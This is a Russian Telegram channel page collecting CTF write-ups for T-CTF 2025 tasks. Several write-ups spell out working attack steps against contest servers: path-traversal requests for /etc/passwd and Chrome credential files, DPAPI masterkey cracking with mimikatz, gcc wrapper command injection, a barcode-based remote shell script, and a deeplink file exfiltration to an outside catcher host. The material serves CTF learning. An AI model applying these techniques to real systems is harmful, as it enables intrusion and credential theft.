У вас закончился пробный период!
Для полного доступа к функционалу, пожалуйста, оплатите премиум подписку
WR
Райтапы по CTF{2025}
https://t.me/writeup_ctf
Возраст канала
Создан
Язык
Русский
3.38%
Вовлеченность по реакциям средняя за неделю
29.4%
Вовлеченность по просмотрам средняя за неделю

☺️ Уютное сообщество для публикации райтапов с разных CTF соревнований и платформ

💬 Наш ламповый чатик: @writeup_chat

Сообщения Статистика
Репосты и цитирования
Сети публикаций
Сателлиты
Контакты
История
Топ категорий
Здесь будут отображены главные категории публикаций.
Топ упоминаний
Здесь будут отображены наиболее частые упоминания людей, организаций и мест.
Найдено 139 результатов
WR
Райтапы по CTF{2025}
1 671 подписчик
5
3
400
Представляем вам два подробных разбора заданий Капибариста и Капибратство с T-CTF 2025 от @TheSa1kyo. Не пропустите!

#tctf2025
24.04.2025, 20:51
t.me/writeup_ctf/632
WR
Райтапы по CTF{2025}
1 671 подписчик
2
350
Ну что котята, как международка?)
Попа-боль? 🩹

https://cyberbattle.standoff365.com/battle/36?section=ratings&tab=redTeam
24.04.2025, 20:40
t.me/writeup_ctf/631
WR
Райтапы по CTF{2025}
1 671 подписчик
1
2
462
#crypto #coding #tctf2025
Капибьюти

Суть задания, расшифровать купон, который зашифровал креативный маркетолог.

В задании дается картинка со множеством изображений и одна строка с надписью "Салон капибьюти спа", которая отсылает нас к ключу от шифра, однако полностью ключа нет, придется додумывать самому, то есть та буква, что находится над картинкой ей и присваивается.

Таким образом расставив все буквы, соответствующие картинкам, и додумав по смыслу слова, получим сообщение, введя которое на сайте, получим флаг. 

Автор: @MRX_120

💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
24.04.2025, 15:17
t.me/writeup_ctf/630
WR
Райтапы по CTF{2025}
1 671 подписчик
16
531
Чуть обновил профиль на стендофе
Теперь красиво...
https://standoff365.com/profile/freenameruuu/
24.04.2025, 11:12
t.me/writeup_ctf/629
WR
Райтапы по CTF{2025}
1 671 подписчик
10
2
580
#web
👀 Реестр Мемов

В эпоху строгого контроля и цифрового наблюдения правительство внедрило "Реестр Мемов". Теперь каждый мем подлежит обязательной регистрации. Пользователи, распространяющие незарегистрированные мемы, рискуют получить серьезные штрафы.

Твоя задача — обойти модерацию мемов, добавить мем в реестр и восстановить законные права пользователей на мемы!

https://mem.givemeflag.com/

Автор: @denis_bardak

Напоминаем, что флаг нужно сдавать боту @writeup_ctf_bot

💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
23.04.2025, 20:20
t.me/writeup_ctf/628
WR
Райтапы по CTF{2025}
1 671 подписчик
3
11
577
Кстати, вот здесь еще одна подборка интересных райтапов с #tctf2025 от @SpriteCT, разбираются задачки:

• #Капибады
• #Капибургер
• #Капибокс
• #Капибегущая
• #Капибаза
• #Капипаркинг
• #Капиблеф
• #Капаре
• #Капибаксы
• #Капибанк

Не пропустите!

💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
23.04.2025, 14:38
t.me/writeup_ctf/627
WR
Райтапы по CTF{2025}
1 671 подписчик
11
18
562
#web #tctf2025
Капибординг

Регистрируем аккаунт сноубордиста, в описании таска делается акцент на том, что под донатами сноубордистов, лыжники оставляют гневные комментарии.

Пробуем инжектить скрипт в заголовок доната - отлично есть XSS

Создаем донат, в описание инжектим данный скрипт:

После чего лыжники-боты заходят чтобы оставить комментарий, получают ошибку, так как такого пути для картинки не существует. Из за этого выполняется скрипт по триггеру об ошибке, скрипт за лыжника вводит 100500 минут в донате и нажимает на кнопку отправки.

Автор: @wkiseven

💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
23.04.2025, 14:28
t.me/writeup_ctf/626
WR
Райтапы по CTF{2025}
1 671 подписчик
11
18
507
#misc #forensics
Капибариста

1) Идем на сайт и видим форму с логином. Креды нам не даны, поэтому тыкаем по единственной доступной кнопке - политике о персональных данных. Попадаем на URL:
https://t-barista-adminfilestorage-XXXXXX.spbctf.org/?path=/policy.pdf&action=download
2) Пробуем поменять путь и убрать тег action:
GET /?path=/../../../../../../../../../../../etc/passwd HTTP/2
В ответ получаем:

403 Forbidden

Forbidden


Попытка взлома


Ага... А если убрать тег action?
GET /?path=/ HTTP/2
Попадаем в файловый менеджер в вебе!
Однако ничего интересного в текущей папке не находим. Пробуем выбраться при помощи следующего пейлоада:
GET /?path=/./../ HTTP/2
Вылетаем в корневую директорию, кайф
Можем считать /etc/passwd:
GET /?path=/./../etc/passwd HTTP/2
Ответ:

Пропустим момент с бесконечными поисками интересных файлов и перейдем к сути: в /mnt примонтирован виндовый диск C:
3) Находим интересные приложения на диске C:
GET /?path=/./../mnt/C/Users/capybarman/AppData/Local/Google/Chrome HTTP/2
По этому пути узнаем, что в системе стоит Chrome. А значит, там может быть сохранена кука для авторизации на сайте!
Забираем SQLite базу данных со всеми кредами хрома:
GET /?path=/./../mnt/C/Users/capybarman/AppData/Local/Google/Chrome/User+Data/Default/Login+Data HTTP/2
База данных на ОС Windows зашифрована так называемым masterkey, который мы можем достать по пути
GET /?path=/./../mnt/C/Users/capybarman/AppData/Roaming/Microsoft/Protect//S-1-5-21-1023654651-2831612651-3133783694-1000/c637715b-e447-4cd5-9a72-445ef3861446 HTTP/2
Однако не все так просто - masterkey в свою очередь зашифрован паролем пользователя. Поэтому используем утилиту DPAPImk2john и сбрутим хеш:
python3 DPAPImk2john.py --sid="S-1-5-21-1023654651-2831612651-3133783694-1000" --masterkey="c637715b-e447-4cd5-9a72-445ef3861446" context="local" > hash.txt
Ну и запустим john со словарем rockyou.txt на полученный хеш. Получим пароль Capybara1792
4) Для расшифровки masterkey запустим утилиту mimikatz и выполним:
dpapi::masterkey /in:"c637715b-e447-4cd5-9a72-445ef3861446" /sid:"S-1-5-21-1023654651-2831612651-3133783694-1000" /password:"Capybara1792" /protected
В самом низу будет наш masterkey.
5) Расшифруем ключ при помощи полученного masterkey, также используя mimikatz. Для начала вытащим сам зашифрованный ключ:
GET /?path=/./../mnt/C/Users/capybarman/AppData/Local/Google/Chrome/User+Data/Local+State HTTP/2
Он будет находиться по ключу os_crypt.enrypted_key в JSON файле по пути выше. Также перед записью в файл его надо декодировать из base64 и убрать первые 5 символов из раскодированного значения - DPAPI. Сохраним результат в файл dec_data
Запускаем mimikatz и вводим:
dpapi::blob /masterkey:MASTERKEY_FROM_4_STEP /in:"dec_data" /out:"aes.dec"
6) Теперь надо вынуть password из вытащенной на 3 этапе базы данных
SELECT origin_url, username_value, password_value FROM logins
И расшифровать при помощи полученного AES-ключа (можно использовать этот скрипт, например)
7) Получаем пароль OmgSoAdminPasswordVerySecure2025 с логином admin,  авторизуемся на сайте, отключаем опцию "только соевое молоко", наслаждаемся анимацией и получаем флаг!

Автор: @ll0ydik
23.04.2025, 14:02
t.me/writeup_ctf/625
WR
Райтапы по CTF{2025}
1 671 подписчик
5
7
536
#misc #telegram #tctf2025
Капиблогер (обе версии)

Надо отправить боту сообщение "Конкурсы" без начального "/start" - тогда пользователь не будет авторизован и будет возвращаться везде 0 - то есть мы станем организатором.

Пример кода:
from telethon import TelegramClient
import asyncio

async def main():
    # Create application https://my.telegram.org/apps
    api_id = ...
    api_hash = '...'
    session_name = "wtf"
    client = TelegramClient(session_name, api_id, api_hash)
    await client.start()

    msg = await client.send_message('@capyblogger_XXXXXX_bot', 'Конкурсы')
    print(f'Отправлено сообщение {msg.id} в чат {msg.chat_id}')

    await client.run_until_disconnected()

asyncio.run(main())

Автор: @tonysdx

💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
23.04.2025, 13:52
t.me/writeup_ctf/624
WR
Райтапы по CTF{2025}
1 671 подписчик
5
15
568
#infra #linux #c
Капибассейн

В аргументы вставляем
-wrapper /bin/sh,-c,'echo -e "#!/bin/sh\ncat ./new_secret.txt" > main'
Таким образом вместо бинаря main у нас появляется скрипт main, который выведет флаг.

Думаю, стоит уточнить, что при использовании wrapper gcc не генерит бинарный файл на выходе.

Автор: @tonysdx

💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
23.04.2025, 13:42
t.me/writeup_ctf/623
WR
Райтапы по CTF{2025}
1 671 подписчик
13
28
646
#misc #telegram #tctf2025
Капиблогер (обе версии)

В боте, который выдается, не нажимать кнопку /start, а изменить тему чата, тогда создастся чат, но не пропишется /start и не выдастся роль.

Автор: @iamgosten

💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
23.04.2025, 11:31
t.me/writeup_ctf/622
WR
Райтапы по CTF{2025}
1 671 подписчик
9
6
591
#coding #finance #tctf2025
Капибаксы

Автор: @dnk33

💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
23.04.2025, 09:53
t.me/writeup_ctf/621
WR
Райтапы по CTF{2025}
1 671 подписчик
14
666
Ребят, присылайте ваши райтапы на TCTF, даже если это первый райтап в вашей жизни, не стесняйтесь ❤️
22.04.2025, 21:47
t.me/writeup_ctf/620
WR
Райтапы по CTF{2025}
1 671 подписчик
15
6
686
#web #debug #tctf2025
Капипаркинг

Наша задача подделать билет и попасть на паркинг в качестве вип гостя.
Билет проверяет паркомат Капибаровска.
У нас есть пример билета обычного посетителя.
На билете есть штрих код в формате CODE39.
Находим в интернете генератор таких штрихкодов ( или пишем на python ) и пытаемся, поменять какие-то значения.
Пример кода на билете, который шифруется 1%BABAN123%202504191104%.
Понимаем, что после каждого знака % идет разделение информации по типам.
Вторая часть отвечает за номер авто, в данном случае BABAN123, потом 3 часть -  дата и время 202504191104.
Первая отвечает за тип билета, пытаемся менять его. 3%BABAN123%202504191104% - в таком случае билет считается vip, но паркомат требует vip ключ.
Тогда перебираем дальше и находим режим debug: 9%BABAN123%202504191104%. В нем от нас просят не ключ, а команду.
Пробуем добавить к коду на билете "ls%"  и у нас есть ответ!
Пытаемся узнать кто мы и потыкать команды.
В итоге читаем файл по пути app/routes.py и находим там флаг.
Вот скрипт на python, который сам генерирует штрих код, отправляет его на сервер и эмитирует командную строку машины на той стороне:
from barcode import get_barcode_class
from barcode.writer import ImageWriter
from io import BytesIO
import requests
import json

# 1. Генерация штрихкода CODE39 в памяти (без сохранения на диск)
def generate_barcode(code_text):
    Code39 = get_barcode_class('code39')
    code39 = Code39(code_text, writer=ImageWriter())

    buffer = BytesIO()
    code39.write(buffer, options={'format': 'PNG'})
    buffer.seek(0)

    return buffer

# 2. Отправка POST-запроса
def send_barcode_image(image_buffer, filename="barcode.png"):
    files = {
        'image': (filename, image_buffer, 'image/png')
    }

    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
        "Referer": "https://t-parking-0a2zxpo1.spbctf.org/",
        "Origin": "https://t-parking-0a2zxpo1.spbctf.org",
        "Accept": "*/*"
    }

    cookies = {
        "__cfduid": "7aec16a4dbb0ab6f8f27fac37264dce0"
    }

    response = requests.post(
        "https://t-parking-0a2zxpo1.spbctf.org/scan",
        files=files,
        headers=headers,
        cookies=cookies
    )

    return response.text

# --- Запуск ---
if __name__ == "__main__":

    while True:
        code = "9%BABAN123%202504191104%"
        command = input("> ")
        # code = code.replace(" ", "")  # Убираем пробелы
        code += command + "%"
        filename = "barcode.png"      # Имя файла только для запроса

        img = generate_barcode(code)

        response = send_barcode_image(img, filename)

        try:
            json_data = json.loads(response)
            parking_fee = json_data.get("parking_fee", "")
            if parking_fee is not None:
                parking_fee_cleaned = parking_fee.replace("\n", " ").strip()
            pretty = json.dumps(json_data, indent=2, ensure_ascii=False)
            print(parking_fee_cleaned)
        except json.JSONDecodeError:
            print("[!] Ответ не является JSON:")
            print(response)

Автор: @Evgeniy12337382

💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
22.04.2025, 15:34
t.me/writeup_ctf/619
WR
Райтапы по CTF{2025}
1 671 подписчик
10
13
687
#web #tctf2025
Капиблеф

Переходим на сайт, тестим формы отправки, замечаем, что при методе сброса карт на стол (showdown), отправляются jwt-токены в формате:
{"action":"showdown","cards":["eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJkZWNrIiwiZXhwIjoxNzQ1ODIzMDIxLCJuYmYiOjE3NDUyMTgyMjEsImlhdCI6MTc0NTIxODIyMSwiY2FyZCI6eyJyYW5rIjoiMyIsInN1aXQiOiJDbHVicyJ9fQ.ovIt-0l5F3f0WA9kmlIaey4y1os2MM2xptPh3x_i3jI","eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJkZWNrIiwiZXhwIjoxNzQ1ODIzMDIxLCJuYmYiOjE3NDUyMTgyMjEsImlhdCI6MTc0NTIxODIyMSwiY2FyZCI6eyJyYW5rIjoiSyIsInN1aXQiOiJDbHVicyJ9fQ.HbRidMO_tZ0jzuj5j0FRRWuXQQjfOyEe3v80Y_sv0xk"]}
Дешифровав данный токен, видим что в них зашифрованы сбрасываемые карты, в данном случае - 3 крестов и король крестов соответственно.
{
  "iss": "deck",
  "exp": ,
  "nbf": ,
  "iat": ,
  "card": {
    "rank": "K",
    "suit": "Clubs"
  },
  "header": {
    "alg": "HS256",
    "typ": "JWT"
  }
}
Предполагаем, что можно подменять карты, в момент сбрасывания на стол,и действительно.

Вставив 2 раза последний токен, получаем пару королей.
{"action":"showdown","cards":["eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJkZWNrIiwiZXhwIjoxNzQ1ODIzMDIxLCJuYmYiOjE3NDUyMTgyMjEsImlhdCI6MTc0NTIxODIyMSwiY2FyZCI6eyJyYW5rIjoiSyIsInN1aXQiOiJDbHVicyJ9fQ.HbRidMO_tZ0jzuj5j0FRRWuXQQjfOyEe3v80Y_sv0xk","eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJkZWNrIiwiZXhwIjoxNzQ1ODIzMDIxLCJuYmYiOjE3NDUyMTgyMjEsImlhdCI6MTc0NTIxODIyMSwiY2FyZCI6eyJyYW5rIjoiSyIsInN1aXQiOiJDbHVicyJ9fQ.HbRidMO_tZ0jzuj5j0FRRWuXQQjfOyEe3v80Y_sv0xk"]}
Видим, что при каждой раздаче мы можем узнавать jwt-токен и соответствующую карту.

Таким образом, соберем себе словарь из колоды карт в формате:
токен - карта.

Теперь при каждой раздаче, выбираем из собранных карт наиболее высокие комбинации и подменяем jwt-токены (стрит, флеш).

Я победил в основном, используя каре из тузов.

После серии из 13 побед, получаем сертификат, содержащий флаг.

Автор: @konsgory

💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
22.04.2025, 10:50
t.me/writeup_ctf/618
WR
Райтапы по CTF{2025}
1 671 подписчик
4
6
743
#reverse #tctf2025
Капибарса

Первое пытался сделать перебором (комп умер), второе сделал от обратного.

Финальное число для открытия замка это values = 4143632706302433

Мы берем его и начинаем идти в обратку, вычитаем вначале число, потом делим.

Как я выбирал какое число вычесть?

Вокруг центрального блока есть описание:

1)если к сенсору подставить желтый то (values * 4)+3

И так далее.

Я вычитал все значения и делил на 4 если число получалось целым-> я ставил букву соответствующую и делал дальше, потом отобразил получившиеся символы в обратном порядке и подставил tctf{те самые символы}, флаг сдан.

Автор: @serega00731

💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
21.04.2025, 22:47
t.me/writeup_ctf/617
WR
Райтапы по CTF{2025}
1 671 подписчик
18
13
767
#web #tctf2025
Капибальпы

Суть задания, украсть у сноубордистов минуты для скипасов. Сноубордисты создали запрос на минуты (донаты).

Я создал 2 аккаунта, и посмотрел какой заброс отсылается кода ты передаешь минуты. Там обычный ПОСТ запрос, и в нем отсылается JSON:
{“minutes”:1}
Самое банальное что можно сделать поставить -1, вуаля вместо доната ты забираешь время)))

Ну и для получения флага надо получить достижение которое есть в профиле лыжника.

«Укради 100500 минут у сноубордиста»

Отправляем запрос с -100500 и всё готово.

Автор: @serega00731

💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
21.04.2025, 22:20
t.me/writeup_ctf/616
WR
Райтапы по CTF{2025}
1 671 подписчик
14
17
865
#mobile #tctf2025
Капибивень

Декомпилируем (при помощи jadx, например)
По пути com.epriori.bone.domain.api находим следующий класс:
public interface Api {
    @FormUrlEncoded
    @POST("/api/partners/add")
    Object addPartner(@Field("name") String str, @Field("homePageUrl") String str2, Continuation> continuation);

    @POST("/api/approve")
    Object approve(@Field("secret") String str, @Field("url") String str2, Continuation> continuation);

    @GET("/api/partners")
    Object getPartners(Continuation>> continuation);

    @GET("/api/posts")
    Object getPosts(Continuation>> continuation);

    @GET("/api/unapproved")
    Object getUnapproved(@Query("secret") String str, Continuation>> continuation);

    @POST("/api/reject")
    Object reject(@Field("secret") String str, @Field("url") String str2, Continuation> continuation);
}
Из него мы видим, что есть какой-то secret, который мы не знаем, и есть незащищенные ручки, в частности /api/partners/add с query parameters name и homePageUrl
Попробуем добавить в homePageUrl свой url своего сервера и увидим, что туда ходит бот!

Далее в AndroidManifest.xml:
           
               
               
               
               
           

Гуглим и находим, что в теге data зарегистрирован так называемый deeplink bone://supportreport, который вызывает Intent функцию у нашего приложения:
private final void handleIntent(Intent intent) {
        String action = intent.getAction();
        Uri data = intent.getData();
        if (!Intrinsics.areEqual("android.intent.action.VIEW", action) || data == null) {
            return;
        }
        String queryParameter = data.getQueryParameter("file");
        String queryParameter2 = data.getQueryParameter(ImagesContract.URL);
        if (queryParameter != null && queryParameter2 != null) {
            createTempFileAndSend(queryParameter, queryParameter2);
        } else {
            Toast.makeText(this, "Неверные параметры в deeplink", 0).show();
        }
    }
Отсюда понимаем, что у deeplink есть 2 параметра - ImagesContract.URL = "url" и file. Покопав код и подебажив код, обнаруживаем, что при помощи deeplink мы можем отправлять файлы с локального устройства на любой url. Однако методом тыка обнаруживаем, что бот не ходит на bone:// ссылки изначально. Поэтому добавляем на наш сайт редирект на ссылку bone://, где file это сохраненный SharedPreferences в формате .xml:


Ну и на наш сервер прилетает ответ:
POST / HTTP/1.1
Host: l.requestcatcher.com
Accept-Encoding: gzip
Connection: Keep-Alive
Content-Length: 340
Content-Type: multipart/form-data; boundary=1875aa9b-8256-4409-95a4-b2781be8c082
User-Agent: okhttp/3.14.9

--1875aa9b-8256-4409-95a4-b2781be8c082
Content-Disposition: form-data; name="file"; filename="moderator_info.xml"
Content-Type: text/plain
Content-Length: 131



    tctf{b3_CArEFul_W1Th_7H3_dE3P_L1nk}


--1875aa9b-8256-4409-95a4-b2781be8c082--

Автор: @tonysdx

💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
20.04.2025, 23:20
t.me/writeup_ctf/615
WR
Райтапы по CTF{2025}
1 671 подписчик
4
8
846
#web #reverse #infra #tctf2025
Капибаза

Нужно было проанализировать код в файле content.js и составить ссылку для получения флага.

Конечный результат:

https://firestore.googleapis.com/v1/projects/t-capybase/databases/(default)/documents/sniffed

Автор: @masm32

💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
20.04.2025, 21:50
t.me/writeup_ctf/614
WR
Райтапы по CTF{2025}
1 671 подписчик
7
32
905
#misc #network #coding #tctf2025
Капибегущая строка

Для начала надо экспортировать данные из wireshark в csv файл. Кода у меня нет, можно сделать чрез файл-Export Packet Dissections но там будут лишние строки и у меня код перестал работать. Потом надо написать код преобразующий полученные данные в матрицу, чтобы потом анимировать бегущую строку. Краткое пояснение логики "преобразования матрицы" (функция create_address_mapping)

Под "преобразованием матрицы" здесь понимается процесс отображения одномерного набора адресов устройств (например, 0x0100, 0x0101, ..., 0x0140) на двумерную сетку (матрицу) координат (строка, столбец) для визуализации.

Логика этого преобразования следующая:

Получение и фильтрация адресов: Функция получает на вход множество (set) всех уникальных адресов назначения, найденных в CSV-файле. Сначала отбираются только корректные шестнадцатеричные адреса (начинающиеся с 0x).

Числовое представление и сортировка: Отобранные адреса (которые являются строками) преобразуются в целые числа. Это критически важно для правильной сортировки. Если сортировать строки, то "0x10a" может оказаться раньше "0x109". После преобразования в числа адреса сортируются по возрастанию. Теперь у нас есть упорядоченный список адресов от самого младшего к самому старшему.

Итерация и вычисление координат: Скрипт проходит по этому отсортированному списку адресов. Для каждого адреса известен его порядковый номер (индекс) в этом списке (начиная с 0). Этот индекс используется для вычисления координат на сетке:

Номер строки (row) вычисляется как результат целочисленного деления (//) индекса на количество столбцов в сетке (GRID_COLS). Это показывает, сколько полных строк уже "заполнено" адресами перед текущим.

Номер столбца (col) вычисляется как остаток от деления (%) индекса на количество столбцов в сетке (GRID_COLS). Это показывает позицию адреса внутри его строки.

Предположение о порядке: Этот метод расчета координат предполагает так называемый "row-major order" (построчный порядок). Это значит, что сетка заполняется адресами слева направо, сверху вниз, сначала полностью заполняется первая строка, потом вторая и так далее.

Проверка границ: Скрипт проверяет, не превышает ли вычисленный номер строки (row) максимально допустимый (GRID_ROWS - 1). Если превышает, выводится предупреждение, так как адресов оказалось больше, чем ячеек в заданной сетке.

Создание карты: Результатом является словарь (mapping), где каждому исходному шестнадцатеричному адресу (строке) сопоставляется кортеж с его вычисленными координатами (строка, столбец). Эта карта затем используется функцией create_animation для отрисовки пикселя каждого устройства в нужном месте кадра.

Пример:
Допустим, GRID_COLS = 13.

Адрес с index = 0 -> row = 0 // 13 = 0, col = 0 % 13 = 0 -> Координаты (0, 0)

Адрес с index = 12 -> row = 12 // 13 = 0, col = 12 % 13 = 12 -> Координаты (0, 12)

Адрес с index = 13 -> row = 13 // 13 = 1, col = 13 % 13 = 0 -> Координаты (1, 0) (переход на следующую строку)

Адрес с index = 26 -> row = 26 // 13 = 2, col = 26 % 13 = 0 -> Координаты (2, 0)

Таким образом, упорядоченный список адресов "разворачивается" в двумерную сетку заданного размера

Автор: @K1rlII

💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
20.04.2025, 21:31
t.me/writeup_ctf/613
WR
Райтапы по CTF{2025}
1 671 подписчик
1
20.04.2025, 21:31
t.me/writeup_ctf/612
WR
Райтапы по CTF{2025}
1 671 подписчик
1
Капибегущая строка
medium misc network coding

Автор @K1rlII

Для начала надо экспортировать данные из wireshark в csv файл. Кода у меня нет, можно сделать чрез файл-Export Packet Dissections но там будут лишние строки и у меня код перестал работать. Потом надо написать код преобразующий полученные данные в матрицу, чтобы потом анимировать бегущую строку. Краткое пояснение логики "преобразования матрицы" (функция create_address_mapping)

Под "преобразованием матрицы" здесь понимается процесс отображения одномерного набора адресов устройств (например, 0x0100, 0x0101, ..., 0x0140) на двумерную сетку (матрицу) координат (строка, столбец) для визуализации.

Логика этого преобразования следующая:

Получение и фильтрация адресов: Функция получает на вход множество (set) всех уникальных адресов назначения, найденных в CSV-файле. Сначала отбираются только корректные шестнадцатеричные адреса (начинающиеся с 0x).

Числовое представление и сортировка: Отобранные адреса (которые являются строками) преобразуются в целые числа. Это критически важно для правильной сортировки. Если сортировать строки, то "0x10a" может оказаться раньше "0x109". После преобразования в числа адреса сортируются по возрастанию. Теперь у нас есть упорядоченный список адресов от самого младшего к самому старшему.

Итерация и вычисление координат: Скрипт проходит по этому отсортированному списку адресов. Для каждого адреса известен его порядковый номер (индекс) в этом списке (начиная с 0). Этот индекс используется для вычисления координат на сетке:

Номер строки (row) вычисляется как результат целочисленного деления (//) индекса на количество столбцов в сетке (GRID_COLS). Это показывает, сколько полных строк уже "заполнено" адресами перед текущим.

Номер столбца (col) вычисляется как остаток от деления (%) индекса на количество столбцов в сетке (GRID_COLS). Это показывает позицию адреса внутри его строки.

Предположение о порядке: Этот метод расчета координат предполагает так называемый "row-major order" (построчный порядок). Это значит, что сетка заполняется адресами слева направо, сверху вниз, сначала полностью заполняется первая строка, потом вторая и так далее.

Проверка границ: Скрипт проверяет, не превышает ли вычисленный номер строки (row) максимально допустимый (GRID_ROWS - 1). Если превышает, выводится предупреждение, так как адресов оказалось больше, чем ячеек в заданной сетке.

Создание карты: Результатом является словарь (mapping), где каждому исходному шестнадцатеричному адресу (строке) сопоставляется кортеж с его вычисленными координатами (строка, столбец). Эта карта затем используется функцией create_animation для отрисовки пикселя каждого устройства в нужном месте кадра.

Пример:
Допустим, GRID_COLS = 13.

Адрес с index = 0 -> row = 0 // 13 = 0, col = 0 % 13 = 0 -> Координаты (0, 0)

Адрес с index = 12 -> row = 12 // 13 = 0, col = 12 % 13 = 12 -> Координаты (0, 12)

Адрес с index = 13 -> row = 13 // 13 = 1, col = 13 % 13 = 0 -> Координаты (1, 0) (переход на следующую строку)

Адрес с index = 26 -> row = 26 // 13 = 2, col = 26 % 13 = 0 -> Координаты (2, 0)

Таким образом, упорядоченный список адресов "разворачивается" в двумерную сетку заданного размера
20.04.2025, 21:31
t.me/writeup_ctf/610
WR
Райтапы по CTF{2025}
1 671 подписчик
1
20.04.2025, 21:31
t.me/writeup_ctf/611
WR
Райтапы по CTF{2025}
1 671 подписчик
1
20.04.2025, 21:21
t.me/writeup_ctf/609
WR
Райтапы по CTF{2025}
1 671 подписчик
1
20.04.2025, 21:21
t.me/writeup_ctf/608
WR
Райтапы по CTF{2025}
1 671 подписчик
4
37
996
#network #trick #tctf2025
Капибрань

В задании нужно было найти страну клиента, который делает запросы через различные (9) прокси.

Если отправить какие-либо данные клиенту, он сразу же ответит, из чего можно узнать RTT (round-trip time) между своим сервером и клиентом. Тогда, если вычесть RTT между сервером и прокси, мы получим RTT между клиентом и прокси.

Считая, что оно пропорционально расстоянию от клиента до прокси <=> скорость постоянна, можно найти страну, для которой значения скорости примерно одинаковы, это можно сделать, например, вычислив стандартное отклонение.
Такое решение неидеально, для некоторых стран полученные отклонения могут быть очень близки, и нужно определять страну по RTT вручную.

Например, в моем случае у Испании и Швеции были почти одинаковые значения отклонения, но RTT равнялся ~330/370 мс, если клиент был в Испании/Швеции и передавал данные через 138.199.60.5 (да, можно было просто сделать таблицу с RTT для всех стран и одного/нескольких прокси и искать страны по ней, но это неинтересно).

Автор: @q4927

💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
20.04.2025, 21:20
t.me/writeup_ctf/607
WR
Райтапы по CTF{2025}
1 671 подписчик
18
734
Просто напоминаю что все мы будем рады райтапам….
20.04.2025, 20:47
t.me/writeup_ctf/606
WR
Райтапы по CTF{2025}
1 671 подписчик
7
1
945
По окончанию T-CTF присылайте ваши райтапчики мне или @Max_RSC, оперативно опубликуем 👉
20.04.2025, 14:24
t.me/writeup_ctf/605
WR
Райтапы по CTF{2025}
1 671 подписчик
1
415
Этот пост для мемов
Если мне очень понравится мем я персонально отсыплю звездочек
давайте веселиться
19.04.2025, 05:02
t.me/writeup_ctf/604
WR
Райтапы по CTF{2025}
1 671 подписчик
1
389
Вы только посмотрите, это на нашего маленького хакера такое надо

Eat Sleep Burp Repeat

Спасибо @b4bk4 за ссылочку
17.04.2025, 15:16
t.me/writeup_ctf/603
WR
Райтапы по CTF{2025}
1 671 подписчик
16
2
389
17.04.2025, 15:16
t.me/writeup_ctf/602
WR
Райтапы по CTF{2025}
1 671 подписчик
21
1
453
Ура, мы дома 🏘️
Пошел побеждать джетлаг
15.04.2025, 21:59
t.me/writeup_ctf/601
WR
Райтапы по CTF{2025}
1 671 подписчик
8
4
524
#crypto
Загадка Евклида

7A 6A 75 72 6C 76 48 54 09 54 5C 04 7A 66 4A 0D 40 71 04 67 7F 51 03 5D 67 75 08 5D 47 04 02 5B 62 4E

На столе в кабинете математика кто-то оставил загадочную записку с этим текстом. Помоги разобраться, что это может значить.

Формат флага: KFCCTF{}

Автор: @while_not_False

Напоминаем, что флаг нужно сдавать боту @writeup_ctf_bot

💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
15.04.2025, 17:34
t.me/writeup_ctf/600
WR
Райтапы по CTF{2025}
1 671 подписчик
10
2
489
Не так давно в открытом доступе появились все необходимые инструменты для самостоятельной компиляции и запуска программ для Эльбрус на своих x86 хостах. Ну что же, это отличный повод проверить, как классические бинарные уязвимости выглядят и эксплуатируются на этой архитектуре!

#pwn #эльбрус
climb-the-mountain

Достаточно ли ты силен, чтобы забраться на гору?

nc 45.12.114.80 32008

book | guide | toolchain

Автор: @s41nt0l3xus

Зеркало тасков

Напоминаем, что флаг нужно сдавать боту @writeup_ctf_bot

#таск@writeup_ctf

💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
14.04.2025, 18:14
t.me/writeup_ctf/599
WR
Райтапы по CTF{2025}
1 671 подписчик
4
469
Напоминаю, что у нас есть ламповый чатик! Там можно спросить совета и скинуть смешной мем.

Ссылка на чат - @writeup_chat 👉
12.04.2025, 21:53
t.me/writeup_ctf/596
WR
Райтапы по CTF{2025}
1 671 подписчик
6
7
577
#pwn
biba-and-boba

Всех занулили... Остались только Биба и Боба.

nc 45.12.114.80 32005

Автор: @s41nt0l3xus

Зеркало тасков

Напоминаем, что флаг нужно сдавать боту @writeup_ctf_bot

#таск@writeup_ctf

💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
11.04.2025, 17:21
t.me/writeup_ctf/595
WR
Райтапы по CTF{2025}
1 671 подписчик
Репост
4
2
390
Привет! Объявляем конкурс авторских статей на Life-Hack - Хакер

Что сделать:
- Прислать свою статью @adm1nLH.
- Статья должна быть на тему Информационной Безопасности, ИИ и быть полезной.
- Статья должна быть интересной и действительно авторской. Никакого рерайта!

Желательно приложить скриншоты, код, мемасики (если они в тему).
Объем статьи от 3000 символов (без воды).

Оценка статьи будет производиться нашим главредом.

Старт:
Старт конкурса с момента публикации этого объявления.
Окончание конкурса - 15 апреля включительно.

Чек-лист:
- Статья не менее 500 слов (3000 символов без пробелов);
- Статья начинается с введения, краткого описания сути;
